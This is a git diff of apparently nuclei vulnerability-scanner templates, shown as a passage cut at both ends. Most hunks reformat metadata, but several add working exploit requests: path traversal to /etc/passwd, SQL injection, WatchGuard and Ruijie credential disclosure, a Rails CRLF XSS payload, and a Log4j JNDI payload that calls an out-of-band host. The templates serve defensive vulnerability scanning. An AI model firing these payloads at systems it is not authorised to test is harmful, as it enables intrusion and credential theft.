- - type: status - status: - - 200 diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index a59b7b3bd1..1dcb73f600 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -5,8 +5,10 @@ info: author: dwisiswant0 severity: high description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. - reference: https://www.exploit-db.com/exploits/48877 + reference: + - https://www.exploit-db.com/exploits/48877 tags: auth-bypass + requests: - raw: - | diff --git a/vulnerabilities/other/watchguard-credentials-disclosure.yaml b/vulnerabilities/other/watchguard-credentials-disclosure.yaml new file mode 100644 index 0000000000..acbdf45a0a --- /dev/null +++ b/vulnerabilities/other/watchguard-credentials-disclosure.yaml @@ -0,0 +1,32 @@ +id: watchguard-credentials-disclosure + +info: + name: WatchGuard Fireware AD Helper Component - Credentials Disclosure + author: gy741 + severity: critical + description: A credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory + credentials for a Windows domain in plaintext. + reference: + - https://www.exploit-db.com/exploits/48203 + - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability + tags: watchguard,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"fullyQualifiedName"' + - '"logonDomain"' + - '"username"' + - '"password"' + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml index 384fe2d49f..57b71c0d34 100644 --- a/vulnerabilities/other/webui-rce.yaml +++ b/vulnerabilities/other/webui-rce.yaml @@ -1,13 +1,14 @@ id: webui-rce + info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 + reference: + - https://www.exploit-db.com/exploits/36821 tags: webui,rce - requests: - method: GET path: diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index db201ad502..951a568d3d 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -1,13 +1,14 @@ id: wems-manager-xss info: - name: WEMS Enterprise Manager XSS + name: WEMS Enterprise Manager - Cross-Site Scripting author: pikpikcu severity: medium - tags: xss - description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. + description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the + 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html + tags: xss requests: - method: GET @@ -25,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/WooYun-2015-148227.yaml b/vulnerabilities/other/wooyun-2015-148227.yaml similarity index 86% rename from vulnerabilities/other/WooYun-2015-148227.yaml rename to vulnerabilities/other/wooyun-2015-148227.yaml index fba7ec1520..4a65d8356a 100644 --- a/vulnerabilities/other/WooYun-2015-148227.yaml +++ b/vulnerabilities/other/wooyun-2015-148227.yaml @@ -1,10 +1,12 @@ -id: WooYun-2015-148227 +id: wooyun-2015-148227 + info: name: Seeyon WooYun LFR author: princechaddha severity: high description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker. - reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + reference: + - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html tags: seeyon,wooyun,lfi requests: diff --git a/vulnerabilities/other/wooyun-path-traversal.yaml b/vulnerabilities/other/wooyun-path-traversal.yaml index 3956371181..32f0591370 100644 --- a/vulnerabilities/other/wooyun-path-traversal.yaml +++ b/vulnerabilities/other/wooyun-path-traversal.yaml @@ -4,12 +4,13 @@ info: name: Wooyun Path Traversal author: pikpikcu severity: high - reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html description: | A general document of UFIDA ERP-NC contains a vulnerability (affecting a large number of well-known school government and enterprise cases such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) - tags: lfi + reference: + - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + tags: lfi,wooyun requests: - method: GET @@ -26,4 +27,4 @@ requests: - - part: body - condition: and \ No newline at end of file + condition: and diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml index b972d9a3d9..2fea61f35d 100644 --- a/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/vulnerabilities/other/wuzhicms-sqli.yaml @@ -1,9 +1,11 @@ id: wuzhicms-sqli + info: name: Wuzhicms v4.1.0 SQL Injection author: princechaddha severity: high - reference: https://github.com/wuzhicms/wuzhicms/issues/184 + reference: + - https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli requests: diff --git a/vulnerabilities/other/xdcms-sqli.yaml b/vulnerabilities/other/xdcms-sqli.yaml index c0204fd48c..aff7f9d904 100644 --- a/vulnerabilities/other/xdcms-sqli.yaml +++ b/vulnerabilities/other/xdcms-sqli.yaml @@ -4,7 +4,8 @@ info: name: XdCMS SQL Injection author: pikpikcu severity: high - reference: https://www.uedbox.com/post/35188/ + reference: + - https://www.uedbox.com/post/35188/ tags: sqli,xdcms requests: diff --git a/vulnerabilities/other/xerox-efi-lfi.yaml b/vulnerabilities/other/xerox-efi-lfi.yaml new file mode 100644 index 0000000000..3bed6e8b43 --- /dev/null +++ b/vulnerabilities/other/xerox-efi-lfi.yaml @@ -0,0 +1,28 @@ +id: xerox-efi-lfi + +info: + name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure + author: gy741 + severity: high + description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary + files on the affected system. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php + - https://packetstormsecurity.com/files/145570 + - https://www.exploit-db.com/exploits/43398/ + tags: iot,xerox,disclosure,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index e9f9d9d864..0078f2b883 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -4,13 +4,13 @@ info: name: Yapi Remote Code Execution author: pikpikcu severity: critical - tags: yapi,rce description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + tags: yapi,rce requests: - raw: diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml index 1189161af1..03e359a5d1 100644 --- a/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml @@ -4,9 +4,10 @@ info: name: Apache Yarn ResourceManager RCE author: pdteam severity: low - tags: apache,rce description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code. - reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 + reference: + - https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 + tags: apache,rce requests: - method: POST diff --git a/vulnerabilities/other/yishaadmin-lfi.yaml b/vulnerabilities/other/yishaadmin-lfi.yaml new file mode 100644 index 0000000000..3d516701fa --- /dev/null +++ b/vulnerabilities/other/yishaadmin-lfi.yaml @@ -0,0 +1,27 @@ +id: yishaadmin-lfi + +info: + name: yishaadmin path traversal + author: Evan Rubinstein + severity: high + description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication. + reference: + - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/ + - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186 + tags: lfi,yishaadmin + +requests: + - raw: + - | + GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/yonyou-u8-oa-sqli.yaml b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml new file mode 100644 index 0000000000..e65cbf9cab --- /dev/null +++ b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml @@ -0,0 +1,25 @@ +id: yonyou-u8-oa-sqli + +info: + name: Yonyou U8 OA Sqli + author: ritikchaddha + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + tags: yonyou,oa,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5("{{randstr}}")}}' + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/zcms-v3-sqli.yaml b/vulnerabilities/other/zcms-v3-sqli.yaml index 3936c83257..61c4b5440d 100644 --- a/vulnerabilities/other/zcms-v3-sqli.yaml +++ b/vulnerabilities/other/zcms-v3-sqli.yaml @@ -1,9 +1,11 @@ id: zcms-v3-sqli + info: name: ZCMS SQL Injection author: princechaddha severity: high - reference: https://www.anquanke.com/post/id/183241 + reference: + - https://www.anquanke.com/post/id/183241 tags: zcms,sqli requests: diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/other/zhiyuan-file-upload.yaml index f596b39871..4057d76160 100644 --- a/vulnerabilities/other/zhiyuan-file-upload.yaml +++ b/vulnerabilities/other/zhiyuan-file-upload.yaml @@ -1,12 +1,14 @@ id: zhiyuan-file-upload info: - name: Zhiyuan OA arbitrary file upload vulnerability + name: Zhiyuan OA Arbitrary File Upload Vulnerability author: gy741 severity: critical - description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. - reference: https://www.programmersought.com/article/92658169875/ - tags: zhiyuan,rce + description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server and cause execute arbitrary code to be executed. + reference: + - https://www.programmersought.com/article/92658169875/ + remediation: Apply the appropriate patch. + tags: zhiyuan,rce,upload requests: - method: GET @@ -27,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/04 diff --git a/vulnerabilities/other/zhiyuan-oa-info-leak.yaml b/vulnerabilities/other/zhiyuan-oa-info-leak.yaml index 668eacf45e..53256a5be1 100644 --- a/vulnerabilities/other/zhiyuan-oa-info-leak.yaml +++ b/vulnerabilities/other/zhiyuan-oa-info-leak.yaml @@ -4,7 +4,8 @@ info: name: Zhiyuan Oa A6-s info Leak author: pikpikcu severity: info - reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md + reference: + - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md tags: zhiyuan,leak,disclosure requests: diff --git a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml index deccd94de0..0bc5c52bf0 100644 --- a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml +++ b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. - reference: https://www.zhihuifly.com/t/topic/3345 + reference: + - https://www.zhihuifly.com/t/topic/3345 tags: zhiyuan,leak,disclosure requests: diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 38a20c3a9a..86b727fd15 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -5,7 +5,8 @@ info: author: dwisiswant0 severity: high description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. - reference: https://www.exploit-db.com/exploits/48880 + reference: + - https://www.exploit-db.com/exploits/48880 tags: auth-bypass,zms requests: diff --git a/vulnerabilities/rails/rails6-xss.yaml b/vulnerabilities/rails/rails6-xss.yaml index 05d14c2db1..6bc1c7b911 100644 --- a/vulnerabilities/rails/rails6-xss.yaml +++ b/vulnerabilities/rails/rails6-xss.yaml @@ -1,16 +1,18 @@ id: rails6-xss + +# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); +# Nuclei has issues with 302 response missing a Location header thus the +# extended payload to make Nuclei work. +# Working poc by @Mad-robot +# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: https://hackerone.com/reports/904059 - tags: rails,xss - - # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); - # Nuclei has issues with 302 response missing a Location header thus the - # extended payload to make Nuclei work. - # Working poc by @Mad-robot - # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + reference: + - https://hackerone.com/reports/904059 + tags: rails,xss,crlf requests: - method: POST diff --git a/vulnerabilities/ransomware/deadbolt-ransomware.yaml b/vulnerabilities/ransomware/deadbolt-ransomware.yaml new file mode 100644 index 0000000000..f0baa2ef88 --- /dev/null +++ b/vulnerabilities/ransomware/deadbolt-ransomware.yaml @@ -0,0 +1,16 @@ +id: deadbolt-ransomware + +info: + name: Deadbolt Ransomware Detection + author: pdteam + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." \ No newline at end of file diff --git a/vulnerabilities/rocketchat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml index 3e4626f984..5ec32d7a37 100644 --- a/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -5,7 +5,8 @@ info: author: rojanrijal severity: critical description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens. - reference: https://docs.rocket.chat/guides/security/security-updates + reference: + - https://docs.rocket.chat/guides/security/security-updates tags: rocketchat,unauth requests: diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/ruijie/ruijie-eg-rce.yaml similarity index 91% rename from vulnerabilities/other/ruijie-eg-rce.yaml rename to vulnerabilities/ruijie/ruijie-eg-rce.yaml index fc7ebb44a7..236a2e9889 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/ruijie/ruijie-eg-rce.yaml @@ -4,7 +4,8 @@ info: name: Ruijie EG cli.php RCE author: pikpikcu severity: critical - description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. + description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' + privileges due to a vulnerability in the login screen. reference: - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://www.ruijienetworks.com @@ -38,7 +39,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "nobody:.*:0:0" part: body @@ -52,4 +53,4 @@ requests: group: 1 internal: true regex: - - 'admin ([a-zA-Z0-9#@]+)",' \ No newline at end of file + - 'admin ([a-zA-Z0-9#@]+)",' diff --git a/vulnerabilities/other/ruijie-networks-lfi.yaml b/vulnerabilities/ruijie/ruijie-networks-lfi.yaml similarity index 93% rename from vulnerabilities/other/ruijie-networks-lfi.yaml rename to vulnerabilities/ruijie/ruijie-networks-lfi.yaml index 94f932e9bf..796119899a 100644 --- a/vulnerabilities/other/ruijie-networks-lfi.yaml +++ b/vulnerabilities/ruijie/ruijie-networks-lfi.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: high description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. - reference: https://exploit-db.com/exploits/48755 + reference: + - https://exploit-db.com/exploits/48755 tags: ruijie,lfi requests: diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml similarity index 89% rename from vulnerabilities/other/ruijie-networks-rce.yaml rename to vulnerabilities/ruijie/ruijie-networks-rce.yaml index a93e658328..5285f1a570 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/ruijie/ruijie-networks-rce.yaml @@ -6,8 +6,8 @@ info: severity: critical reference: - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py - - https://www.ruijienetworks.com # vendor homepage - tags: ruijie,rce + - https://www.ruijienetworks.com + tags: ruijie,rce,network requests: - raw: @@ -27,7 +27,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "nobody:x:0:0:" part: body diff --git a/vulnerabilities/ruijie/ruijie-password-leak.yaml b/vulnerabilities/ruijie/ruijie-password-leak.yaml new file mode 100644 index 0000000000..f281f1862a --- /dev/null +++ b/vulnerabilities/ruijie/ruijie-password-leak.yaml @@ -0,0 +1,34 @@ +id: ruijie-password-leak + +info: + name: RG-UAC Ruijie Password Leak + author: ritikchaddha + severity: high + description: Security Notice of Information Disclosure Vulnerability in Multiple Firewall Devices + reference: + - https://forum.butian.net/share/177 + metadata: + shodan-query: http.html:"Get_Verify_Info" + tags: password,leak,ruijie,exposure,firewall,router + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);' diff --git a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml index 17b89f72fa..6a77076f13 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml @@ -4,7 +4,8 @@ info: name: Samsung Wlan AP (WEA453e) LFI author: pikpikcu severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,lfi requests: @@ -16,7 +17,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "bin:.*:1:1" part: body - type: status diff --git a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml index 801ec50137..3d2ab419f2 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml @@ -4,7 +4,8 @@ info: name: Samsung Wlan AP (WEA453e) RCE author: pikpikcu severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,rce requests: @@ -17,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "bin:.*:1:1" part: body diff --git a/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml b/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml index bf1fbf958a..05a6201a35 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml @@ -4,8 +4,10 @@ info: name: Samsung Wlan AP (WEA453e) XSS author: pikpikcu severity: medium - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,xss + requests: - method: GET path: diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index 9247d17e78..169542633f 100644 --- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -1,11 +1,17 @@ id: simple-crm-sql-injection info: - name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass + name: Simple CRM 3.0 SQL Injection and Authentication Bypass author: geeknik severity: high - reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt - tags: sqli,simplecrm,auth-bypass + description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities. + reference: + - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-89 + tags: sqli,simplecrm,auth-bypass,injection requests: - method: POST @@ -28,3 +34,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/03/30 diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index 8d86dd794f..d4673ea0fa 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -4,7 +4,8 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0,ipanda severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its + own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/mpgn/Spring-Boot-Actuator-Exploit diff --git a/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml index 4d1e18bd32..6399788794 100644 --- a/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -4,7 +4,6 @@ info: name: Spring Boot H2 Database RCE author: dwisiswant0 severity: critical - tags: springboot,rce,jolokia reference: - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database - https://twitter.com/pyn3rd/status/1305151887964946432 @@ -12,6 +11,7 @@ info: - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce metadata: shodan-query: http.favicon.hash:116323821 + tags: springboot,rce,jolokia requests: - raw: diff --git a/vulnerabilities/springboot/springboot-log4j-rce.yaml b/vulnerabilities/springboot/springboot-log4j-rce.yaml new file mode 100644 index 0000000000..4286931f8d --- /dev/null +++ b/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -0,0 +1,47 @@ +id: springboot-log4j-rce + +info: + name: Spring Boot Log4j Remote Code Injection + author: pdteam + severity: critical + reference: + - https://logging.apache.org/log4j/2.x/security.html + - https://www.lunasec.io/docs/blog/log4j-zero-day/ + - https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2021-44228 + cwe-id: CWE-502 + remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). + tags: springboot,rce,oast,log4j + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml index 811f02cb35..e54ece65b7 100644 --- a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml +++ b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml @@ -1,12 +1,13 @@ -id: squirrelmail-vkeyboard-xss +id: squirrelmail-address-xss info: name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting author: dhiyaneshDk severity: medium description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/26305 - tags: xss,squirrelmail + reference: + - https://www.exploit-db.com/exploits/26305 + tags: xss,squirrelmail,plugin requests: - method: GET diff --git a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml index 39c58f0758..f87a7c33a5 100644 --- a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml +++ b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml @@ -4,7 +4,8 @@ info: name: SquirrelMail 1.2.11 Local File Inclusion author: dhiyaneshDk severity: high - reference: https://www.exploit-db.com/exploits/22793 + reference: + - https://www.exploit-db.com/exploits/22793 tags: lfi,squirrelmail requests: diff --git a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml index b52889fbf8..dddf453c8f 100644 --- a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml +++ b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDk severity: medium description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/34814 - tags: xss,squirrelmail + reference: + - https://www.exploit-db.com/exploits/34814 + tags: xss,squirrelmail,plugin requests: - method: GET diff --git a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml index b35db666c5..aaec11c2ff 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -4,7 +4,8 @@ info: name: ThinkCMF Arbitrary code execution author: pikpikcu severity: high - reference: https://www.shuzhiduo.com/A/l1dygr36Je/ + reference: + - https://www.shuzhiduo.com/A/l1dygr36Je/ tags: thinkcmf requests: diff --git a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index 78d8dc35ef..f226eaae21 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -4,11 +4,12 @@ info: name: ThinkCMF LFI author: pikpikcu severity: high - reference: https://www.freebuf.com/vuls/217586.html - tags: thinkcmf,lfi + reference: + - https://www.freebuf.com/vuls/217586.html metadata: - win-payload: "../../../../../../../../../../../../../../../../windows/win.ini" - unix-payload: "../../../../../../../../../../../../../../../../etc/passwd" + win-payload: 